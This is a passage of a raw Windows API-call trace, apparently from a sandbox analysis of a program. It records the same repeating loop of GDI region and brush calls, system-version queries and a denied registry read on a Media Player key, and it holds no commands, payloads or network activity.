1 [0089.495] CombineRgn (hrgnDst=0x104567c, hrgnSrc1=0xa40401d9, hrgnSrc2=0xa20401dc, iMode=4) returned 2 [0089.495] CreateSolidBrush (color=0xff) returned 0x210567a [0089.495] CreateSolidBrush (color=0xff0000) returned 0x110567d [0089.495] DeleteObject (ho=0x110567d) returned 1 [0089.495] DeleteObject (ho=0xa20401dc) returned 1 [0089.495] DeleteObject (ho=0xa40401d9) returned 1 [0089.495] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.495] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.495] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.495] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.495] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.495] BeginPath (hdc=0x0) returned 0 [0089.495] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.495] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.495] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.495] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.495] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.495] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.495] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.495] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.496] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa30401dc [0089.496] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa50401d9 [0089.496] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104567e [0089.496] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104567f [0089.496] CombineRgn (hrgnDst=0x104567e, hrgnSrc1=0xa30401dc, hrgnSrc2=0xa50401d9, iMode=1) returned 1 [0089.496] CombineRgn (hrgnDst=0x104567f, hrgnSrc1=0xa30401dc, hrgnSrc2=0xa50401d9, iMode=4) returned 2 [0089.496] CreateSolidBrush (color=0xff) returned 0x210567d [0089.496] CreateSolidBrush (color=0xff0000) returned 0x1105680 [0089.496] DeleteObject (ho=0x1105680) returned 1 [0089.496] DeleteObject (ho=0xa50401d9) returned 1 [0089.496] DeleteObject (ho=0xa30401dc) returned 1 [0089.496] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.496] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.496] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.496] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.496] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.496] BeginPath (hdc=0x0) returned 0 [0089.496] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.496] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.496] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.496] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.496] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.496] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.496] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.496] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.496] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa60401d9 [0089.496] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa40401dc [0089.496] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045681 [0089.496] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045682 [0089.496] CombineRgn (hrgnDst=0x1045681, hrgnSrc1=0xa60401d9, hrgnSrc2=0xa40401dc, iMode=1) returned 1 [0089.496] CombineRgn (hrgnDst=0x1045682, hrgnSrc1=0xa60401d9, hrgnSrc2=0xa40401dc, iMode=4) returned 2 [0089.496] CreateSolidBrush (color=0xff) returned 0x2105680 [0089.496] CreateSolidBrush (color=0xff0000) returned 0x1105683 [0089.496] DeleteObject (ho=0x1105683) returned 1 [0089.496] DeleteObject (ho=0xa40401dc) returned 1 [0089.497] DeleteObject (ho=0xa60401d9) returned 1 [0089.497] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.497] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.497] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.497] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.497] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.497] BeginPath (hdc=0x0) returned 0 [0089.497] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.497] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.497] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.497] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.497] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.497] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.497] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.497] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.497] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa50401dc [0089.497] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa70401d9 [0089.497] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045684 [0089.497] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045685 [0089.497] CombineRgn (hrgnDst=0x1045684, hrgnSrc1=0xa50401dc, hrgnSrc2=0xa70401d9, iMode=1) returned 1 [0089.497] CombineRgn (hrgnDst=0x1045685, hrgnSrc1=0xa50401dc, hrgnSrc2=0xa70401d9, iMode=4) returned 2 [0089.497] CreateSolidBrush (color=0xff) returned 0x2105683 [0089.497] CreateSolidBrush (color=0xff0000) returned 0x1105686 [0089.497] DeleteObject (ho=0x1105686) returned 1 [0089.497] DeleteObject (ho=0xa70401d9) returned 1 [0089.497] DeleteObject (ho=0xa50401dc) returned 1 [0089.497] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.497] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.497] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.497] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.497] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.497] BeginPath (hdc=0x0) returned 0 [0089.497] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.497] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.497] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.497] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.497] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.497] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.498] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.498] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.498] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa80401d9 [0089.498] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa60401dc [0089.498] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045687 [0089.498] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045688 [0089.498] CombineRgn (hrgnDst=0x1045687, hrgnSrc1=0xa80401d9, hrgnSrc2=0xa60401dc, iMode=1) returned 1 [0089.498] CombineRgn (hrgnDst=0x1045688, hrgnSrc1=0xa80401d9, hrgnSrc2=0xa60401dc, iMode=4) returned 2 [0089.498] CreateSolidBrush (color=0xff) returned 0x2105686 [0089.498] CreateSolidBrush (color=0xff0000) returned 0x1105689 [0089.498] DeleteObject (ho=0x1105689) returned 1 [0089.498] DeleteObject (ho=0xa60401dc) returned 1 [0089.498] DeleteObject (ho=0xa80401d9) returned 1 [0089.498] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.498] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.498] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.498] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.498] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.498] BeginPath (hdc=0x0) returned 0 [0089.498] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.498] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.498] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.498] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.498] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.498] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.498] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.498] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.498] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa70401dc [0089.498] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa90401d9 [0089.498] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104568a [0089.498] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104568b [0089.499] CombineRgn (hrgnDst=0x104568a, hrgnSrc1=0xa70401dc, hrgnSrc2=0xa90401d9, iMode=1) returned 1 [0089.499] CombineRgn (hrgnDst=0x104568b, hrgnSrc1=0xa70401dc, hrgnSrc2=0xa90401d9, iMode=4) returned 2 [0089.499] CreateSolidBrush (color=0xff) returned 0x2105689 [0089.499] CreateSolidBrush (color=0xff0000) returned 0x110568c [0089.499] DeleteObject (ho=0x110568c) returned 1 [0089.499] DeleteObject (ho=0xa90401d9) returned 1 [0089.499] DeleteObject (ho=0xa70401dc) returned 1 [0089.499] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.499] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.499] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.499] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.499] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.499] BeginPath (hdc=0x0) returned 0 [0089.499] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.499] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.499] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.499] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.499] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.499] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.499] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.499] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.499] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaa0401d9 [0089.499] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa80401dc [0089.499] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104568d [0089.499] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104568e [0089.499] CombineRgn (hrgnDst=0x104568d, hrgnSrc1=0xaa0401d9, hrgnSrc2=0xa80401dc, iMode=1) returned 1 [0089.499] CombineRgn (hrgnDst=0x104568e, hrgnSrc1=0xaa0401d9, hrgnSrc2=0xa80401dc, iMode=4) returned 2 [0089.499] CreateSolidBrush (color=0xff) returned 0x210568c [0089.499] CreateSolidBrush (color=0xff0000) returned 0x110568f [0089.499] DeleteObject (ho=0x110568f) returned 1 [0089.499] DeleteObject (ho=0xa80401dc) returned 1 [0089.499] DeleteObject (ho=0xaa0401d9) returned 1 [0089.499] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.499] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.499] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.499] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.499] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.500] BeginPath (hdc=0x0) returned 0 [0089.500] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.500] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.500] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.500] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.500] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.500] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.500] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.500] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.500] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa90401dc [0089.500] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xab0401d9 [0089.500] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045690 [0089.500] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045691 [0089.500] CombineRgn (hrgnDst=0x1045690, hrgnSrc1=0xa90401dc, hrgnSrc2=0xab0401d9, iMode=1) returned 1 [0089.500] CombineRgn (hrgnDst=0x1045691, hrgnSrc1=0xa90401dc, hrgnSrc2=0xab0401d9, iMode=4) returned 2 [0089.500] CreateSolidBrush (color=0xff) returned 0x210568f [0089.500] CreateSolidBrush (color=0xff0000) returned 0x1105692 [0089.500] DeleteObject (ho=0x1105692) returned 1 [0089.500] DeleteObject (ho=0xab0401d9) returned 1 [0089.500] DeleteObject (ho=0xa90401dc) returned 1 [0089.500] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.500] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.500] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.500] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.500] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.500] BeginPath (hdc=0x0) returned 0 [0089.500] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.500] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.500] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.500] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.500] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.500] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.500] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.500] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.501] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xac0401d9 [0089.501] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaa0401dc [0089.501] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045693 [0089.501] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045694 [0089.501] CombineRgn (hrgnDst=0x1045693, hrgnSrc1=0xac0401d9, hrgnSrc2=0xaa0401dc, iMode=1) returned 1 [0089.501] CombineRgn (hrgnDst=0x1045694, hrgnSrc1=0xac0401d9, hrgnSrc2=0xaa0401dc, iMode=4) returned 2 [0089.501] CreateSolidBrush (color=0xff) returned 0x2105692 [0089.501] CreateSolidBrush (color=0xff0000) returned 0x1105695 [0089.501] DeleteObject (ho=0x1105695) returned 1 [0089.501] DeleteObject (ho=0xaa0401dc) returned 1 [0089.501] DeleteObject (ho=0xac0401d9) returned 1 [0089.501] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.501] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.501] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.501] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.501] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.501] BeginPath (hdc=0x0) returned 0 [0089.501] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.501] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.501] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.501] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.501] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.501] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.501] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.501] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.501] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xab0401dc [0089.501] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xad0401d9 [0089.501] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045696 [0089.501] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045697 [0089.501] CombineRgn (hrgnDst=0x1045696, hrgnSrc1=0xab0401dc, hrgnSrc2=0xad0401d9, iMode=1) returned 1 [0089.501] CombineRgn (hrgnDst=0x1045697, hrgnSrc1=0xab0401dc, hrgnSrc2=0xad0401d9, iMode=4) returned 2 [0089.501] CreateSolidBrush (color=0xff) returned 0x2105695 [0089.501] CreateSolidBrush (color=0xff0000) returned 0x1105698 [0089.501] DeleteObject (ho=0x1105698) returned 1 [0089.501] DeleteObject (ho=0xad0401d9) returned 1 [0089.501] DeleteObject (ho=0xab0401dc) returned 1 [0089.501] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.501] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, 